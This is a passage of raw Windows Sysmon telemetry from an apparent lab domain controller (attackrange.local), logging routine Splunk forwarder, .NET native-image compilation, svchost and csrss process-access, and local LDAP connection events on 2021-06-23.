21:06:54.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.484{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.485{4DB9351A-A26E-60D3-2405-00000000CF01}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000022529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.601{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61457-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000022528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.601{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61457-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 23542300x800000000000000022527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.311{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F282E4CEC8376305112DDCBF37297E6,SHA256=84FC3EB154C2D408F904C57AAF49D791AA555695AAC35A211DD77D36492D083C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:54.077{4DB9351A-A26D-60D3-2305-00000000CF01}69006584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.905{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.828{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:55.828{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26F-60D3-2705-00000000CF01}5968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.812{4DB9351A-A26F-60D3-2505-00000000CF01}6276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2D6CP7MK75\PresentationCore.ni.dll.auxMD5=24C00B8C59A321950F99D1D227F78044,SHA256=BBF5F7F5F68421D8B48F3C97A9C6E576372C1742AD21A8CF98B45ED0ACA72540,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.812{4DB9351A-A26F-60D3-2505-00000000CF01}6276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2D6CP7MK75\PresentationCore.ni.dllMD5=28921CC9C254333B9D89911A36B465D5,SHA256=75E5FC21A430CC4971E2D7B354B82A7C21D102725CEF6315B42CB1B57A9F1776,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.655{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:55.640{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.640{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.515{4DB9351A-A26F-60D3-2605-00000000CF01}6384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000022544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.561{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2DB6B1A5106EFF36D20C3E20BB0509D,SHA256=88C2CE1E2552301D8A778DC0D7B8A8D1F88894070E97580EA732EF99963821D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.311{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D3BD5D0C9C7E61D82185F75D6E37E6,SHA256=1612A7E7D440F5AF0FA2E167521D96B86015E8472923CD12DC759C4AE05786D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:55.124{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26F-60D3-2505-00000000CF01}6276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-A26D-60D3-2205-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QSG450UOWZ\System.ServiceModel.ni.dll.auxMD5=E7FB67E6360A9EAFB000DFB95B9806D7,SHA256=AA33F00E00CFB07A19DAE9A74A25A947B55059E00154AC216CEE0BEE78E02213,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:55.124{4DB9351A-A26D-60D3-2205-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QSG450UOWZ\System.ServiceModel.ni.dllMD5=9A2FBDD6642DEB5501CE7C0D4DD73941,SHA256=C503088E75F96625BB4CB249D80B28E09184F7E47A289E8D60772855EED85D6B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 